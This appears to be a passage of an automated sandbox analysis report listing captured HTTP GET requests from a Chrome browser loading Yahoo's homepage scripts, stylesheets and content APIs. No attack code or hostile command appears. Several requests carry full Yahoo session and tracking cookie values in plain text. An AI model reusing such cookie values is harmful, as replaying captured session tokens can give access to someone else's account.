Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-toggle-1.15.4-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-video-3.2.2-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-text-1.2.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /libtrc/yahooweb-network/loader.js HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /libtrc/static/topics/taboola-browsing-topics.html HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-bind-1.1.3-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/c/49c25f5.caas-news_web.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-fetch-1.19.1-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-image-1.4.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-beacon-1.3.4-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-rapid-1.10.9-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-lightbox-1.10.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-scrollview-2.23.3-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-countdown-1.2.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-benji-1.2.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /caas/content/article/?uuid=53c53b29-181a-3610-abb6-7342d7ac1416,c0d99429-8a1e-3aa0-b598-bde24fb0d1b7,7fcfc158-f6e5-3b23-a4e2-e608b9d58220&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=rocket_GA_desk_test-3-v1,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1fkbtbdjgb12s HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /caas/content/article/?uuid=763792a6-0264-4c09-8fdc-ad4e3aa042d8,bd87c24a-8c34-4ec0-a681-3564c02d7778,d965fa24-e6a0-3c55-8290-0262978e7d08,7b47460a-662a-3fa6-bc8a-19c327c6fce9,3eb87d51-a7f4-304f-a28c-91350aafdafa,c800f6b2-23f8-4294-bb16-2fcd31dd05bf,a574dfca-1c8e-3952-b021-11a2a439b3b7,7e3e7364-c32b-3510-b0fe-64f202383852,9edb1ffc-4d2e-3ef7-ad6e-b96ef1549f9d,99ea0d11-6a27-33c8-b25a-19733882bdc0&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=rocket_GA_desk_test-3-v1,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1fkbtbdjgb12s HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-fetch-1.19.1-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /manifest_desktop_us.json HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/cprops/colors_1.1.27.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-lightbox-1.10.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-countdown-1.2.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/css/react-wafer-weather.WeatherPreviewRefresh.atomic.ltr.2a251a0ddb3d7c4ec13f4e35ee35dd2b.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-benji-1.2.0-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-scrollview-2.23.3-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fp_ms/_rcv/remote?ctrl=WeatherPreviewRefresh&lang=en-US&m_id=react-wafer-weather&m_mode=json&region=US&rid=1fkbtbdjgb12s&site=fp&apptype=default&instance_id=weather&_evtSrc=deferLoad HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /aaq/fp/css/react-wafer-weather.common.desktop.a03361886464b469acd3a16cfbd022ed.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fp_ms/_rcv/remote?ctrl=Shopping&m_id=react-wafer-shopping&m_mode=json&partner=none HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /aaq/fp/css/react-wafer-shopping.Shopping.atomic.ltr.d156b541c028fe7d3167b101d15500f6.min.css HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-clipboard-copy-1.0.2-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-form-1.34.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-native-da-1.0.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-action-1.8.1-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-clipboard-copy-1.0.2-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-template-1.4.3-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-menu-1.3.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/fp/js/react-wafer-stream.custom.modern.1ed4fe71b1fc647ddbf37a7050944309.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-sticky-1.2.6-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-form-1.34.5-modern.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tag/opus.js HTTP/1.1Host: opus.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /aaq/c/553e048.caas-news_web.min.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
